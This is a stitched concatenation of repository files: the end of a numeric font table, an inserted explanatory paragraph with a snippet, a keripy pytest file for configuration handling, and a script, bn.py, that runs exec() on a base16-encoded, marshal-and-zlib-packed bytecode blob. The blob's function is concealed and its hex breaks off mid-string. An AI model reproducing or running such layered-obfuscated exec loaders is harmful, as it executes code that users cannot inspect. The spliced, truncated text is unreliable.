(8,8,8,8,8,8,8,8,6,8,8,7,8,8,7,8,8,8,8,8,8,8,7,8,8,8,7,8,8,8,6,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,4,8,7,7,8,6,8,8,7,6,8,7,6,8,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,6,8,8,),
(8,6,8,8,8,8,7,8,6,7,8,7,8,8,7,8,8,8,8,8,8,8,7,8,8,8,7,8,8,8,6,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,4,8,6,7,8,5,8,8,6,5,8,0,6,8,8,8,8,8,7,8,8,8,5,8,8,8,8,8,8,8,8,8,7,8,7,7,8,7,8,8,8,5,8,7,),
(1,1,1,1,1,1,1,1,0,1,1,0,1,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,),
(4,4,4,4,4,4,4,4,3,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,3,4,4,4,4,4,4,4,4,4,4,4,4,3,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,3,4,4,),
(7,6,6,6,6,5,6,6,5,5,3,6,3,7,6,6,7,7,6,3,6,6,6,6,6,7,6,3,4,6,5,6,7,7,6,7,7,7,6,7,7,7,7,7,7,7,6,7,6,7,6,3,6,5,5,7,4,7,7,5,4,4,0,5,6,7,5,5,5,6,5,7,7,5,7,7,7,7,5,7,5,7,6,6,6,6,6,7,6,7,4,7,4,4,6,),
(1,1,1,1,1,1,1,1,1,1,1,0,1,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,),
(11,10,11,11,11,11,10,11,9,11,11,10,11,11,10,11,11,11,11,11,11,11,10,11,11,11,10,11,11,11,9,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,7,11,10,10,11,8,11,11,9,8,11,2,9,11,11,11,11,11,10,11,11,11,9,11,11,11,11,11,11,11,11,11,10,11,11,11,11,11,11,11,11,8,11,11,),
(8,6,8,8,8,8,7,8,6,7,8,7,8,8,7,8,8,8,8,8,8,8,7,8,8,8,7,8,8,8,6,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,4,8,6,7,8,5,8,8,6,5,8,0,6,8,8,8,8,8,7,8,8,8,5,8,8,8,8,8,8,8,8,8,7,8,7,7,8,7,8,8,8,5,8,7,),
(8,6,8,8,8,8,7,8,5,7,8,6,8,7,6,8,6,7,7,8,7,8,6,8,8,7,6,8,8,7,6,8,7,8,8,8,8,8,8,8,7,6,8,8,8,8,8,8,8,8,7,4,8,6,7,7,5,7,8,6,5,8,0,6,8,8,8,8,8,7,8,8,8,5,8,8,8,8,8,8,8,8,8,7,8,7,7,6,7,7,8,8,5,8,7,),
(8,6,8,8,8,8,7,8,5,7,8,6,8,7,6,8,6,7,7,8,7,8,6,8,8,7,6,8,8,7,6,8,7,8,8,8,8,8,8,8,7,6,8,8,8,8,8,8,8,8,7,4,8,6,7,7,5,7,8,6,5,8,1,6,8,8,8,8,8,7,8,8,8,5,8,8,8,8,8,8,8,8,8,7,8,7,7,6,7,7,8,8,5,8,7,),
(8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,6,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,4,8,7,7,8,6,8,8,7,8,8,8,6,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,),
(5,5,4,5,5,4,5,5,2,4,1,3,1,4,1,5,3,1,1,2,5,5,0,5,5,5,4,1,1,4,0,4,2,5,5,5,5,5,5,5,4,1,5,5,5,5,5,5,5,5,5,1,5,4,4,3,3,1,5,4,2,3,0,3,3,5,3,3,3,5,3,5,5,4,5,5,5,5,3,5,3,5,4,5,5,5,5,5,5,5,2,5,2,1,5,),
(6,5,6,6,6,6,5,6,3,6,2,5,1,6,5,6,5,6,6,5,6,6,5,6,6,6,5,4,6,6,4,6,6,6,6,6,6,6,6,6,5,5,6,6,6,6,6,6,6,6,6,2,6,5,5,5,3,6,6,4,3,5,0,4,6,6,6,6,6,5,6,6,6,4,6,6,6,6,6,6,6,6,6,5,6,6,6,5,6,6,3,6,3,6,6,),
(5,5,4,5,5,4,5,5,3,4,2,4,2,5,4,5,5,5,4,2,5,5,4,5,5,5,4,2,2,4,3,4,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,2,5,4,4,5,3,5,5,4,2,3,0,3,4,5,3,3,3,5,3,5,5,4,5,5,5,5,3,5,3,5,4,5,5,5,5,5,5,5,2,5,2,2,5,),
(8,8,8,8,8,8,8,8,6,8,8,7,8,8,7,8,8,8,8,8,8,8,7,8,8,8,7,8,8,8,6,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,4,8,7,7,8,6,8,8,7,5,8,0,6,8,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,5,8,8,),
(7,7,6,7,7,6,7,7,4,7,6,5,6,6,4,7,5,4,4,6,7,7,3,7,7,7,6,6,6,6,4,7,5,7,7,7,7,7,7,7,6,4,7,7,7,7,7,7,7,7,7,3,7,6,6,5,5,4,7,6,4,6,0,5,6,7,6,6,6,7,6,7,7,6,7,7,7,7,6,7,6,7,7,7,7,7,7,7,7,7,6,7,4,6,7,),
(11,11,10,11,11,10,11,11,8,11,10,9,10,10,8,11,9,9,9,10,11,11,8,11,11,11,10,10,10,10,8,11,9,11,11,11,11,11,11,11,10,9,11,11,11,11,11,11,11,11,11,7,11,10,10,9,9,9,11,10,8,10,2,9,10,11,10,10,10,11,10,11,11,10,11,11,11,11,10,11,10,11,11,11,11,11,11,11,11,11,10,11,8,10,11,),
(7,7,6,7,7,6,7,7,5,6,5,6,5,7,6,7,7,7,6,5,7,7,6,7,7,7,6,5,5,6,5,6,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,3,7,6,6,7,5,7,7,6,4,5,0,5,6,7,5,5,5,7,5,7,7,6,7,7,7,7,5,7,5,7,6,7,7,7,7,7,7,7,5,7,4,5,7,),
(7,7,6,7,7,6,7,7,4,7,6,5,6,6,4,7,5,4,4,6,7,7,3,7,7,7,6,6,6,6,4,7,5,7,7,7,7,7,7,7,6,4,7,7,7,7,7,7,7,7,7,3,7,6,6,5,5,4,7,6,4,6,3,5,6,7,6,6,6,7,6,7,7,6,7,7,7,7,6,7,6,7,7,7,7,7,7,7,7,7,6,7,4,6,7,),
(6,6,5,6,6,5,6,6,4,6,4,5,4,6,5,6,6,6,5,4,6,6,5,6,6,6,5,4,5,5,4,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,2,6,5,5,6,4,6,6,5,3,5,0,4,5,6,5,5,5,6,5,6,6,5,6,6,6,6,5,6,5,6,6,6,6,6,6,6,6,6,4,6,3,3,6,),
(6,7,4,4,4,4,7,4,7,4,2,7,2,6,7,4,4,4,4,3,4,4,4,4,4,6,7,2,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,7,7,7,3,4,7,4,7,4,4,4,5,5,7,6,7,7,7,4,4,4,7,4,4,4,4,4,4,4,4,5,4,3,7,7,4,4,),
(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,),
(7,4,5,6,6,6,6,7,4,4,7,5,7,6,4,7,5,4,4,7,4,7,4,6,6,6,5,7,5,4,4,7,5,7,7,7,7,7,7,7,6,4,7,7,7,7,7,7,7,7,4,4,7,5,6,4,4,4,7,5,4,5,4,5,5,7,7,7,7,6,7,7,7,4,7,7,7,7,7,7,7,7,7,6,7,6,6,5,6,4,7,7,3,6,4,),
(10,6,8,10,10,9,9,10,7,7,10,8,10,9,7,10,8,6,8,10,5,10,7,9,10,9,8,10,10,5,7,10,8,10,10,10,10,10,10,10,9,5,10,10,10,10,10,10,10,10,9,6,10,8,9,7,7,7,10,8,7,10,1,8,8,10,10,10,10,9,10,10,10,7,10,10,10,10,10,10,10,10,10,9,10,9,9,8,9,7,10,10,6,9,9,),
(6,6,5,6,6,5,6,6,4,6,2,4,1,5,3,6,6,6,6,4,6,6,5,6,6,6,5,4,5,6,6,6,4,6,6,6,6,6,6,6,5,3,6,6,6,6,6,6,6,6,6,5,6,6,6,5,5,5,6,5,3,5,0,5,5,6,5,5,5,6,5,6,6,5,6,6,6,6,5,6,5,6,6,6,6,6,6,6,6,6,3,6,3,3,6,),
)
# End of font
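The rows above close out a font table whose layout is not shown in this excerpt. A plausible reading, and it is only an assumption, is one value per printable ASCII character, looked up by shifting the character code past the 32 non-printable codes. A tiny stand-in row illustrates that indexing:

```python
# Hypothetical stand-in for one row of the font table above; what the real
# values encode (widths? weights?) is not visible in this excerpt.
row = tuple(range(95))  # printable ASCII spans codes 32..126, i.e. 95 entries


def glyph_value(row, ch):
    # Index a per-character row by skipping the 32 control codes (0..31).
    return row[ord(ch) - 32]


assert glyph_value(row, ' ') == 0    # space is the first printable character
assert glyph_value(row, '~') == 94   # tilde is the last
```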
# tests/app/test_configing.py (SmithSamuelM/keripy-wot, Apache-2.0)
# -*- encoding: utf-8 -*-
"""
tests.app.test_configing module
"""
import os
import pytest
from hio.base import doing
from keri.app import configing
from keri.core import coring
def test_configer():
"""
Test Configer class
"""
# Test Filer with file not dir
filepath = '/usr/local/var/keri/cf/main/conf.json'
if os.path.exists(filepath):
os.remove(filepath)
cfr = configing.Configer() # defaults
# assert cfr.path == filepath
# github runner does not allow /usr/local/var
assert cfr.path.endswith("keri/cf/main/conf.json")
assert cfr.opened
assert os.path.exists(cfr.path)
assert cfr.file
assert not cfr.file.closed
assert not cfr.file.read()
assert cfr.human
# plain json manually
data = dict(name="habi", oobi="ABCDEFG")
wmsg = coring.dumps(data)
assert hasattr(wmsg, "decode") # bytes
assert len(wmsg) == cfr.file.write(wmsg)
assert 0 == cfr.file.seek(0)
rmsg = cfr.file.read()
assert rmsg == wmsg
assert data == coring.loads(rmsg)
# default is hjson for .human == True
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
assert 0 == cfr.file.seek(0)
rmsg = cfr.file.read()
assert rmsg == b'{\n name: hope\n oobi: abc\n}' # hjson
cfr.close()
assert not cfr.opened
assert cfr.file.closed
# assert cfr.path == filepath
assert cfr.path.endswith("keri/cf/main/conf.json")
assert os.path.exists(cfr.path)
with pytest.raises(ValueError):
rdata = cfr.get()
cfr.reopen(reuse=True) # reuse True and clear False so don't remake
assert cfr.opened
assert not cfr.file.closed
# assert cfr.path == filepath
assert cfr.path.endswith("keri/cf/main/conf.json")
assert os.path.exists(cfr.path)
assert (rdata := cfr.get()) == wdata # not empty
cfr.reopen() # reuse False so remake but not clear
assert cfr.opened
assert not cfr.file.closed
# assert cfr.path == filepath
assert cfr.path.endswith("keri/cf/main/conf.json")
assert os.path.exists(cfr.path)
assert (rdata := cfr.get()) == wdata # not empty
cfr.reopen(reuse=True, clear=True) # clear True so remake even if reuse
assert cfr.opened
assert not cfr.file.closed
# assert cfr.path == filepath
assert cfr.path.endswith("keri/cf/main/conf.json")
assert os.path.exists(cfr.path)
assert (rdata := cfr.get()) == {} # empty
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
cfr.reopen(clear=True) # clear True so remake
assert cfr.opened
assert not cfr.file.closed
# assert cfr.path == filepath
assert cfr.path.endswith("keri/cf/main/conf.json")
assert os.path.exists(cfr.path)
assert (rdata := cfr.get()) == {} # empty
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
cfr.close(clear=True)
assert not os.path.exists(cfr.path)
with pytest.raises(ValueError):
rdata = cfr.get()
# Test with plain json human==False
cfr = configing.Configer(human=False)
# assert cfr.path == filepath
# github runner does not allow /usr/local/var
assert cfr.path.endswith("keri/cf/main/conf.json")
assert cfr.opened
assert os.path.exists(cfr.path)
assert cfr.file
assert not cfr.human
assert not cfr.file.closed
assert not cfr.file.read()
# .human == False
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
assert 0 == cfr.file.seek(0)
rmsg = cfr.file.read()
assert rmsg == b'{\n "name": "hope",\n "oobi": "abc"\n}' # plain json
cfr.close(clear=True)
assert not os.path.exists(cfr.path)
    # Test with altPath by using not permitted headDirPath /root/keri to force Alt
    filepath = os.path.expanduser('~/.keri/cf/main/conf.json')
if os.path.exists(filepath):
os.remove(filepath)
cfr = configing.Configer(headDirPath="/root/keri")
assert cfr.path.endswith(".keri/cf/main/conf.json")
assert cfr.opened
assert os.path.exists(cfr.path)
assert cfr.file
assert not cfr.file.closed
assert not cfr.file.read()
data = dict(name="habi", oobi="ABCDEFG")
wmsg = coring.dumps(data)
assert hasattr(wmsg, "decode") # bytes
assert len(wmsg) == cfr.file.write(wmsg)
assert 0 == cfr.file.seek(0)
rmsg = cfr.file.read()
assert rmsg == wmsg
assert data == coring.loads(rmsg)
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
cfr.close()
assert not cfr.opened
assert cfr.file.closed
assert cfr.path.endswith(".keri/cf/main/conf.json")
assert os.path.exists(cfr.path)
with pytest.raises(ValueError):
rdata = cfr.get()
cfr.reopen(reuse=True) # reuse True and clear False so don't remake
assert cfr.opened
assert not cfr.file.closed
assert cfr.path.endswith(".keri/cf/main/conf.json")
assert os.path.exists(cfr.path)
assert (rdata := cfr.get()) == wdata # not empty
cfr.reopen() # reuse False so remake but not clear
assert cfr.opened
assert not cfr.file.closed
assert cfr.path.endswith(".keri/cf/main/conf.json")
assert os.path.exists(cfr.path)
assert (rdata := cfr.get()) == wdata # not empty
cfr.reopen(reuse=True, clear=True) # clear True so remake even if reuse
assert cfr.opened
assert not cfr.file.closed
assert cfr.path.endswith(".keri/cf/main/conf.json")
assert os.path.exists(cfr.path)
assert (rdata := cfr.get()) == {} # empty
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
cfr.reopen(clear=True) # clear True so remake
assert cfr.opened
assert not cfr.file.closed
assert cfr.path.endswith(".keri/cf/main/conf.json")
assert os.path.exists(cfr.path)
assert (rdata := cfr.get()) == {} # empty
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
cfr.close(clear=True)
assert not os.path.exists(cfr.path)
with pytest.raises(ValueError):
rdata = cfr.get()
    # test openCF hjson
with configing.openCF() as cfr: # default uses json and temp==True
filepath = '/tmp/keri_cf_2_zu01lb_test/keri/cf/main/test.json'
assert cfr.path.startswith('/tmp/keri_')
assert cfr.path.endswith('_test/keri/cf/main/test.json')
assert cfr.opened
assert cfr.human
assert os.path.exists(cfr.path)
assert cfr.file
assert not cfr.file.closed
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
assert not os.path.exists(cfr.path) # if temp cleans
    # test openCF json
with configing.openCF(human=False) as cfr: # default uses json and temp==True
filepath = '/tmp/keri_cf_2_zu01lb_test/keri/cf/main/test.json'
assert cfr.path.startswith('/tmp/keri_')
assert cfr.path.endswith('_test/keri/cf/main/test.json')
assert cfr.opened
assert not cfr.human
assert os.path.exists(cfr.path)
assert cfr.file
assert not cfr.file.closed
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
assert not os.path.exists(cfr.path) # if temp cleans
    # test openCF mgpk
with configing.openCF(fext='mgpk') as cfr: # default uses temp==True
assert cfr.path.startswith('/tmp/keri_')
assert cfr.path.endswith('_test/keri/cf/main/test.mgpk')
assert cfr.opened
assert os.path.exists(cfr.path)
assert cfr.file
assert not cfr.file.closed
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
assert not os.path.exists(cfr.path) # if temp cleans
# test openCF cbor
with configing.openCF(fext='cbor') as cfr: # default uses temp==True
assert cfr.path.startswith('/tmp/keri_')
assert cfr.path.endswith('_test/keri/cf/main/test.cbor')
assert cfr.opened
assert os.path.exists(cfr.path)
assert cfr.file
assert not cfr.file.closed
wdata = dict(name="hope", oobi="abc")
assert cfr.put(wdata)
rdata = cfr.get()
assert rdata == wdata
assert not os.path.exists(cfr.path) # if temp cleans
"""Done Test"""
def test_configer_doer():
"""
Test ConfigerDoer
"""
cfr0 = configing.Configer(name='test0', temp=True, reopen=False)
assert cfr0.opened == False
assert cfr0.path == None
assert cfr0.file == None
cfrDoer0 = configing.ConfigerDoer(configer=cfr0)
assert cfrDoer0.configer == cfr0
assert cfrDoer0.configer.opened == False
cfr1 = configing.Configer(name='test1', temp=True, reopen=False)
assert cfr1.opened == False
assert cfr1.path == None
    assert cfr1.file == None
cfrDoer1 = configing.ConfigerDoer(configer=cfr1)
assert cfrDoer1.configer == cfr1
assert cfrDoer1.configer.opened == False
limit = 0.25
tock = 0.03125
doist = doing.Doist(limit=limit, tock=tock)
doers = [cfrDoer0, cfrDoer1]
doist.doers = doers
doist.enter()
assert len(doist.deeds) == 2
assert [val[1] for val in doist.deeds] == [0.0, 0.0] # retymes
for doer in doers:
assert doer.configer.opened
assert "_test/keri/cf/main/" in doer.configer.path
doist.recur()
assert doist.tyme == 0.03125 # on next cycle
assert len(doist.deeds) == 2
for doer in doers:
assert doer.configer.opened == True
for dog, retyme, index in doist.deeds:
dog.close()
for doer in doers:
assert doer.configer.opened == False
assert not os.path.exists(doer.configer.path)
# start over
doist.tyme = 0.0
doist.do(doers=doers)
assert doist.tyme == limit
for doer in doers:
assert doer.configer.opened == False
assert not os.path.exists(doer.configer.path)
# test with filed == True
cfr0 = configing.Configer(name='test0', temp=True, reopen=False, filed=True)
assert cfr0.opened == False
assert cfr0.path == None
assert cfr0.file == None
cfrDoer0 = configing.ConfigerDoer(configer=cfr0)
assert cfrDoer0.configer == cfr0
assert cfrDoer0.configer.opened == False
cfr1 = configing.Configer(name='test1', temp=True, reopen=False, filed=True)
assert cfr1.opened == False
assert cfr1.path == None
    assert cfr1.file == None
cfrDoer1 = configing.ConfigerDoer(configer=cfr1)
assert cfrDoer1.configer == cfr1
assert cfrDoer1.configer.opened == False
limit = 0.25
tock = 0.03125
doist = doing.Doist(limit=limit, tock=tock)
doers = [cfrDoer0, cfrDoer1]
doist.doers = doers
doist.enter()
assert len(doist.deeds) == 2
assert [val[1] for val in doist.deeds] == [0.0, 0.0] # retymes
for doer in doers:
assert doer.configer.opened
assert "_test/keri/cf/main/" in doer.configer.path
assert doer.configer.path.endswith(".json")
assert doer.configer.file is not None
assert not doer.configer.file.closed
doist.recur()
assert doist.tyme == 0.03125 # on next cycle
assert len(doist.deeds) == 2
for doer in doers:
assert doer.configer.opened
assert doer.configer.file is not None
assert not doer.configer.file.closed
for dog, retyme, index in doist.deeds:
dog.close()
for doer in doers:
assert doer.configer.opened == False
assert not os.path.exists(doer.configer.path)
assert doer.configer.file is None
# start over
doist.tyme = 0.0
doist.do(doers=doers)
assert doist.tyme == limit
for doer in doers:
assert doer.configer.opened == False
assert not os.path.exists(doer.configer.path)
assert doer.configer.file is None
"""End Test"""
if __name__ == "__main__":
test_configer()
# bn.py (sillytuktuk2020/bn, Apache-2.0)
# Author : AKSHAY DHAWAN
# GitHub : https://github.com/sillytuktuk2020
# instagram decent_deep_raadhe
import base64
exec(base64.b16decode('2320436F6D70696C6564204279203A2042696E79616D696E0A2320476974487562203A2068747470733A2F2F6769746875622E636F6D2F42696E79616D696E2D62696E6E690A2320596F7554756265204368616E6E656C203A20547269636B2050726F6F660A696D706F7274206D61727368616C0A65786563286D61727368616C2E6C6F6164732827635C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830335C7830305C7830305C783030405C7830305C7830305C78303073215C7830305C7830305C783030645C7830305C783030645C7830315C7830306C5C7830305C7830305A5C7830305C783030655C7830305C7830306A5C7830315C783030645C7830325C7830305C7838335C7830315C783030645C7830315C7830305C78303455645C7830315C78303053285C7830335C7830305C7830305C783030695C7866665C7866665C7866665C7866664E73205C7830625C7830305C783030785C7839635C786464595C7864646E5C7864625C7863385C7831355C7862655C7839365C783965625C7863325C786164455C7861395C783932295C7838615C7839322C5C7864625C7861395C7862305C7862305C7831646763645367375C7863655C7830325C783835235C7831304372243126395C7830635C7838375C786234645C7863335C7831375B5C7861305C7866372D5C7864306D7B535C7866345C7861327D5C7838382E5C7862305C7831377D5C7838317D5C6E5C7861335C7866377D5C7838355C783965335C7866635C783131455C786362495C7839636E7B515C7863365C7839313833675C7863655C7839635C7839666F5C78636539335C7866615C78656351375C783131515C786437725C7838336E785C7831355C78636679605C7864343F5C7862335C7862395C7865335C7830365C786233715C7831324F5C786237775C7865625C7866355C7862615C7865625C7838373C5C7838615C745C7831375C78316471253A5C7862315C7865625C7862335C7838654363265F225C783161385C7864635C7865665C7863635C7861395C7839387B5C7861655C7864355C783839585C275C783965475C7838635C7865325C7866635C7863655B5C7863315C7838334E5C783132793060746C5C7863652F5C5C5C78383634335C7831365C783837545C7838383A5C7831375C7831615C7866305C7838625C7839395C78646654225C7839666C47535C7861325C7863355C78636258695C7864355C7861373C225C783031715C7830335C7830325C786363675C786163395C786434755C7862645C7862355F5C7861665C783133785C7830325C7864665C7838615C7863385C7839385C7861345C7861626A5C78663
85C7865355C783036715C7862335C7830375C7831345C786261515C7866635C7865625C7831305C7864395C786231575C7866636B5C7863395C7862395C7866325C783033565C786434445C7865635C786630245C783036363C6441535C7839315C786162765C783838426169495C783133465C7863385C7831345C7839375C7863613A565C7839335C7862345C7861395C7839375C7838387933635C78313847575C7866625C7866322D5C786233505C7863345C786465254C5C7863345C7861325C7863655C783936365C7830626372225C7862625C7838665C7861335C78383847295C7864644A653574435C783033745C783134315C7866355C786263625C7861327A5C783066635C7839665C786439735C7831615C7862385C7864375C7865635C7863315C7839635C7838625C7839395C7831396B745C783961263C5C7863365C786332665C7861667567665C6E5C7830305C7861327D7D7C5C7866305C7865345C7863355C7862315C7865363B5C786239405C7864335C7838385C7866625C7863344F5C7862635C7864385C72236E33215C7863305C7862665A5C7863385C7862395C7839374B78265C7862645C7866655C7831327A525C7864615C5C232D5C7831355C7864385C7865355C7838315C786338495C783866785C783130305C7831625C7862625C7861345C7866635C7831395C7865665C5C5C7863655C7839635C786561305C7865325C7830625C786331225C7838305F5C7863343C4E5C783964265C7830385C7864395C7861614B4F5C7862305C78643861535C6E5C7863325C78623020456A535C7830355C7861385C7865655C7838325C786163755C783138206C69355C7830312F355C786539465C7861325C7839633F5C7839615C7839305C7865335C7861355C7831622B5C7866355A5C7861612A5C7838385C7865345C7863365C7865305C7863325C7839345C7839615C7864615C7866345C786132695C786235522B2E5C7830305C7831342A5C7839645C7863375C7863655C7866355B5B5C7839353D5C7830655C7866365C7861345C7861665C7830384B5C783137615C7862394C5C7838395C7864335C786531365C7838633F525C7864625C7838625C7866335C6E265C7866355C7838655C7830375C7865305A5C7862345C7862367B5C786164495C7864625C7839355C783133225C7831365C2751406C5C7831365C7863335C7839324E2E405C7864615C7862635F5C783832625C7864395C7863356A5C7864395C786237405C7862355C7864305C7864635C786330615C7863625C7861365C7864622A5C7862615C783937635C7862325C786434225C7831367A5C786434664D5C7866355C7864315C783936505C7862375C7864635C7838655C78666
1465C7865665C7866375C7863665C7862375C7863345C7865335C7839655C7861666E5C783839386A5C7866367B5C7865645C7862375C786164745C786432525C7838612F5C74745F5C7863645C7862615C7864365C7839395C7865386A5C786137206855775C7863332272635C7864365C5C5C7862365C786435375C7838315C7839615C7865625C7831335C6E5C786162795C7838645C786636475C7863315C7831395C6E7E4D5C7864615C783034295C7861305C7861667667326B5C7861645C7866375C7865365C7831625C786163562B41555C7864375C7866347E5C7865365C7864645C7862385C783939596A5C7831645C7863395C7864325C783932563E565C7863325C7862345C786564315C7831615C783831705C7839665C786531435C7862653C5C7866645C7865325C7839345C7863385C7864375C7862615C786337677C5C7861635C7861326F4D78705C783936295C786666485C786636695C7839325C7866615C727E5C786265215C7865345C7838365C7864635C7863305C7831665C7839312F5C7866325C783033466E5C7863635C7839366C5C7865325C7838385C786239365C783032737E5C7830315C7865665C7839325C7861377973774E5C7863655C7830373F4D535C7838655C7861305C7830345D5C7862395C7866345C783864295C745C7864655C7861343D5C7866355C7866615C7866365C7838335C7839665C7866615C7865645F5C786665465C7830655C783932785C78636522605C7862344F5C7830655C7864645C7865305C7838615C7866616E205C7866625C786266705C786533675C783839255C7866625C786537715C7831635C7838615C7866646E775C7865365C7863365C7866335C7863345C7864326C5C786565635C7831325C7839305C7861345C7864625C7866305C7831325C786238725C7863325C78616678725C783936585C7830635C275C783963455C7861657D415E465C7839634F5C7865355C7864302158505C7838343C2E5C7866315C7838615C78393124445C6E5C7863645C786361465C7839315C7866315C78613768413E5C7866305C7861305C78653752405C7862385C783137725C7862625C7863372E5C7862635C783031785C786366555C725C7838373B5C7861615C786136655F5C783161515C27295C783163395C786332515C783132225C7831365C786433385C7861665C7862635C7838395C7863656F5C7866665C7866345C7864625C745C7866395C7839325C786366205C7839365C7839305C7839335C783830286D5C7864655C7865613C5C7862655C7830625C7863615C7863375C7865625C7839385C7861625C7864372D6A5C7865335C7839327A5D2436465C786335695C7865325C7861315C7830345C783
9335C7862615C7831645A5C7865395C7830625C7862665C7831305C7865395C7838625C7865625C7861345C786466525C7865362B5C78626640715C7831655C7865395C786631415C7830305C7831375C725C7863305C7862305C7837665C7865315C7862385C78313124285C7861645C7863627D5C7862375C7861625C7865315C7861335C7861345C783034595C783161387D554A5C7830315C7866385C5C5C7838355C7831395C7830375C7865365C745C7862365F5C7865365C7839355C7861375A3B245C7863305C7863665C783161245C7866385F5C7830625C786166485C7863365C7866645C786434775C7861315C7861355C7862345C7864653F675C7839355C7831395C786632795C7861355C783139575C7862395C7866385C7861395C7838655C786436465C7831645C7864375C7864343A5C78383420735C7866315C7838324E5D5C783861795C7866625C786533345C7866343E455C7863335C786361425C7831655C78626664735C786538615C7864315C7863335C7831345C7861655C786230295C7865625C7865655C7861645C7865395C7865657D585C7866375C7861665C7839325C7863385C7861325C7863315C7837665C7864315C7861625C7864395C7830325C7865395C7864375C7838337D5C7839625C7863642E5C7861625C7831385C7861655C7861395C7831387E585C78633529755C786166695C7862305C786130735C7838667E5C7839345C7839653E5C7830625C7839324F5C7864315C7862345C7862634E486D5C7839665C7830365C7830665C7864335C7862353C5C786266345C786233245C78386554396D5C7865665C786537755C7863345A7A5C786139492B405C7864325C7865325C7831372C5C7831655C7863625C7863325C783132235C7838665C7830365C7830315C7830385C783836352C5C783865305C7861395C7865355C7865355C786462695C786136796D235C78616634325C7863395C7863615C7865355C7830635C786638612D7C493D5C786437515C7864365C7865395C7866335C7861615C7831395C7839375C786139245C7863635E6B5C783964345C7861665C786563525C7839625C7839355C7865345C78653531565C783163455C7862355C7830365C78623579532D3243445C7863335C786239365C7838353A5C7863305C7838325C7865325D665C7830385C7839667D4E655C78613433515C786431605C7861635C7862365C7861355C7863325C7862385C7831615C7830353E585C7866316B585C7861645C78383926305C786436625C7862365C783934435C7830315C786635715C7839345C7839655C7861625C7866305C786336305C7831385C78643764385C7838345C7830655C7864375C78633166665C7839365
C7865375C7865635C786561635C786564725C7831325C7831335C7863315C7839382F483C5C786137315C7862395C786532495C7830345C7839355C7839635C7863645C7831335C7861385C7866385C7865302C42285C7862315C7865375C783063525C783131475C7866615C7839665C7864306A5C7839395C7861305C7831625C7861615B5C786164525C7864365C7865655C7861665C7862625C7831315C786232315C786434425C7838325C7830345C7839385C783832625C7831365C7830352C2676315C783033455C783934656B5C7831395B5C7838615C7864345C7831625C7866305C783938555C786232585C7862305C7861635C7861615C7864615C7864623F5C7866667E427E5C745C7865365C7838345C7866345C7861625C7862345C7864315C7863326D5C7838355C7861633F4A5C7838355C7866615C7865345C74215C7839325C786461755C7861615C7862345C7830355C786539505C7866665C7862395C7862325C7839645C786237565C7866337B5C783133725C783134615C7862327B5C7830317B5C7861305C7863345C7864375C7839385C7839305C786437215C7831655C7830365C7863395C7865315C786530355C7838305C7839357B5C7861355C7863315C7866655C7838343C5C7865355C7839655C7863375C783137305C7838625C7839635C7830365C786534695C7838365C7861345C7831325C786339405C7861365D725C7839615C7863345C7861354E3D2D5C7864385C7864662B5C7831665C783935762B555C786631695C7831335C7861636E5C7863662D79425C5C5C7839386E5C783130265C7839385C7864665C783033426E5C7866665C7866385C7839625C7837667D5C7866665C7863335C7838665C7837665C7866665C7866315C7831665C7862375C7864665C7866645C7830305C7831665C7837665C7866385